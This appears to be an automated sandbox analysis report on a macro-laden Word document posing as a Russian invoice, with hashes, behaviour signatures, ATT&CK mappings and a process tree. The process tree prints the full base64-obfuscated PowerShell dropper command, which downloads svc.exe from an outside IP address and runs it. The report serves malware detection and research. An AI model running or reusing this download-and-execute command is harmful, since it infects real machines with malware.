Resubmissions

23-05-2024 18:22

240523-wzxb1abf94 10

Analysis

  • max time kernel
    137s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-05-2024 18:22

General

  • Target

    Накладная.rtf.docm

  • Size

    518KB

  • MD5

    1f2d795ca29afadf24325cfbb3f60e4e

  • SHA1

    d5e05bf7300a09b6706082907e726b0d5a09e550

  • SHA256

    616476ce3c35d67b5edbb73b6c8965d5894f404f90074add16986f8d5c81d6f0

  • SHA512

    40ff395e3e62e9c0b47d9ec088129042b26ceeee28c76c23615086c33fcbc57250a8c4ea53464dfd5398a5e023743dca988d7c86ec1f6039a873d8b3352393b7

  • SSDEEP

    6144:sEc+F+HLHNIvPl8qZDC9VT8L38S8WyI6OLxoq5seCsH8BB3y8dqtUO2TsyUrOSo:sEcJHNopZW9eLH8WyITLfyXXvqxj9o

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://94.232.249.161/download/svc.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Накладная.rtf.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4820
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c timeout 3 && Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzk0LjIzMi4yNDkuMTYxL2Rvd25sb2FkL3N2Yy5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmMuZXhlIjsgJFdlYi5Eb3dubG9hZEZpbGUoJFVybCwgJFB0aCk7IEludm9rZS1FeHByZXNzaW9uICRQdGg7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3260
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzk0LjIzMi4yNDkuMTYxL2Rvd25sb2FkL3N2Yy5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmMuZXhlIjsgJFdlYi5Eb3dubG9hZEZpbGUoJFVybCwgJFB0aCk7IEludm9rZS1FeHByZXNzaW9uICRQdGg7')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA5ADQALgAyADMAMgAuADIANAA5AC4AMQA2ADEALwBkAG8AdwBuAGwAbwBhAGQALwBzAHYAYwAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAC4AZQB4AGUAIgA7ACAAJABXAGUAYgAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABVAHIAbAAsACAAJABQAHQAaAApADsAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAkAFAAdABoADsA
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2436
          • C:\Users\Admin\AppData\Local\Temp\svc.exe
            "C:\Users\Admin\AppData\Local\Temp\svc.exe"
            5⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            PID:2160
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2160 -s 352
              6⤵
              • Program crash
              PID:4344
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2160 -ip 2160
    1⤵
      PID:4424

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    3
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    3
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      1a11402783a8686e08f8fa987dd07bca

      SHA1

      580df3865059f4e2d8be10644590317336d146ce

      SHA256

      9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0

      SHA512

      5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ddnhftkv.m1e.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\svc.exe
      Filesize

      180KB

      MD5

      92c57dd80b764a028749520017d44e76

      SHA1

      f732220adaacf23de6cc69d964341766d2e350d9

      SHA256

      dbd741a45d840d06d708339f9e9824f2a0d745ea6537ca44bff233ba7441bfda

      SHA512

      dd7d363fef5750a256abc2ae43d17f8e4788d392afaa74a2085f34da05efeb12373f38fbf480e1c86eb2759c667c971c7c54512f5d59ee61f5a0a4341ac406c8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl
      Filesize

      262KB

      MD5

      51d32ee5bc7ab811041f799652d26e04

      SHA1

      412193006aa3ef19e0a57e16acf86b830993024a

      SHA256

      6230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97

      SHA512

      5fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810

    • memory/2160-63-0x0000000000400000-0x0000000002349000-memory.dmp
      Filesize

      31.3MB

    • memory/3636-37-0x000001EA3A5A0000-0x000001EA3A5C2000-memory.dmp
      Filesize

      136KB

    • memory/4820-7-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-6-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-9-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-10-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-11-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-12-0x00007FF96E3B0000-0x00007FF96E3C0000-memory.dmp
      Filesize

      64KB

    • memory/4820-13-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-14-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-15-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-26-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-0-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-8-0x00007FF96E3B0000-0x00007FF96E3C0000-memory.dmp
      Filesize

      64KB

    • memory/4820-5-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-4-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-3-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-1-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-2-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-384-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-547-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB

    • memory/4820-570-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-571-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-573-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-572-0x00007FF970470000-0x00007FF970480000-memory.dmp
      Filesize

      64KB

    • memory/4820-574-0x00007FF9ADE80000-0x00007FF9AE149000-memory.dmp
      Filesize

      2.8MB